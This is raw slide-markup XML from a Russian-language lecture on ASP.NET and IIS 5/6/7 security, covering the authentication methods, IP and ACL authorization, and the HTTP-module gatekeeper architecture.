              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>среда выполнения получит пришедший запрос, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t> сама выполняет проверку безопасности.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>IIS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>предоставляет две важных средства проверки безопасности:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Аутентификация</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> Результатом любой </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>IIS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>аутентификации, заканчивается определением учетной записи пользователя </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Windows. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Т.е. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>IIS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>поддерживает только зарегистрированных в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>пользователей.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> IIS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>поддерживает </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Базовую аутентификацию </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Digest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t> аутентификацию</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Passport </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>аутентификацию</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>аутентификацию</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Certificate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>аутентификацию</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>по каналу </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>SSL.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Авторизация: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>IIS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>предоставляет встроенную поддержку ограничений на </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>адреса и оценку </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Windows ACL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ccess </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ontrol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" smtClean="0"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ists), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>что является способом защиты ресурсов, поддерживаемым ОС.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Конфиденциальность: шифрование может быть усилено с помощью </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>SSL.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="180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sz="4000" smtClean="0"/>
              <a:t>Аутентификация в IIS 5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" i="1" smtClean="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>и IIS 6.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>Если </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>приложение будет использовать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>аутентификацию, то нужно сконфигурировать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>IIS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>на использование </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Basic (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Digest) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>аутентификации.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>Если </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>приложение не будет</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>использовать учетные записи </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Windows (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>будет использовать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>form </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>аутентификацию</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>, то нужно разрешить </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t> использовать анонимный доступ.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ru-RU" sz="28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706437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>Аутентификация </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t> 5 и 6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="3251200" cy="3629025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Показано, как можно задать метод аутентификации используемый для </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>приложения</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33796" name="Picture 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3851275" y="1412875"/>
            <a:ext cx="4957763" cy="5100638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-R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smtClean="0"/>
              <a:t>Методы аутентификации</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4924425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Метод "Windows authentication" заставляет IIS сравнивать учетную запись (credentials) пользователя с учетными записями Windows локального компьютера или домена локальной сети. При работе в домене, зарегистрированным пользователям домена не требуется вводить их имена и пароли, если они уже подключились к клиентскому компьютеру сети, так как билет аутентификации пользователя передается на сервер автоматически.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Метод "Basic authentication" разработан W3C корпорацией и описывает дополнительный HTTP заголовок (header) для передачи  имен и паролей пользователей по сети. Но следует отметить, что ничто не шифруется. Информация передается с использованием кодирования Base64. В связи с этим, можно использовать Basic authentication только вместе с SSL. Как и в случае с Windows authentication, учетные данные введенные пользователем сверяются с учетной запись Windows. Но способ передачи учетных данных по сети различен. В то время, как при Basic authentication информация передается в HTTP header, при Windows authentication используется или протокол NTLM (Windows NT LAN Manager) - простой протокол запроса-ответа аутентификации) или протокол Kerberos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Метод "Digest authentication" аналогичен "Basic authentication". Вместо отправки по сети учетных данных, кодированных с помощью Base64, он хеширует пароль пользователя и передает хешированные данные по сети. Этот метод используется редко, кроме контролируемых сред, (таких как интранет).</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ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Метод "Passport authentication" использует в качестве базовой инфрасруктуры Microsoft Passport. Microsoft Passport реализует централизованное управление распознаванием (идентичностью). В этом случае учетные данные пользователя управляются специальным сервером - Passport server. Хотя обычно эта инфраструктура реализуется на серверах Microsoft, можно установить и свою собственную Passport инфраструктуру. В консоле управления, как “.NET Passport authentication”, но это обобщенный механизм аутентификации, который не связан с самой .NET Framework. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>В настоящее время не следует использовать Passport authentication, так как она заменена "Windows Live ID", которая является частью платформы Windows Live. Windows Live ID основывается на той же концепции централизованно хранимых ID, но реализована на много более открытой платформе, чем среда Passport. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>IIS также поддерживает еще один дополнительный метод аутентификации - certificate authentication, который конфигурируется посредством SSL.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777875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>Авторизация </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t> 5 и 6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="2890838" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Показано, как можно задать ограничения на адреса </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> которым  разрешен доступ с помощью</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> IIS. </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Ограничения на </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>адреса позволяют ограничить доступ к </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>серверу только компьютерами заданными в списке</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Это имеет смысл, если нужно разрешить доступ только нескольким партнерам по бизнесу к вашему </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>серверу</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36868" name="Picture 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3708400" y="1412875"/>
            <a:ext cx="5280025" cy="4911725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-R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ru-RU" smtClean="0"/>
              <a:t>Сравнение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>IIS 5(6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>IIS 7</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37891" name="Picture 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403350" y="1700213"/>
            <a:ext cx="5973763" cy="4421187"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-R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sz="4000" smtClean="0"/>
              <a:t>Архитектура безопасности </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>ASP.Net</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="4000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="1323975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>Используется концепция </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Gatekeepers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>Набор </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>модулей. Каждый модуль это класс реализующий интерфейс </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>IHttpModule</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38916" name="Picture 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="250825" y="3227388"/>
            <a:ext cx="8642350" cy="3265487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-RU"/>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b="1" smtClean="0"/>
              <a:t>Secure Sockets Layer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ru-RU" smtClean="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ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>аутентификация</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4997450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Выполняется с помощью специализированных </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>модулей, которые реализуют интерфейс </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>IHttpModule </a:t>
            </a:r>
            <a:r>
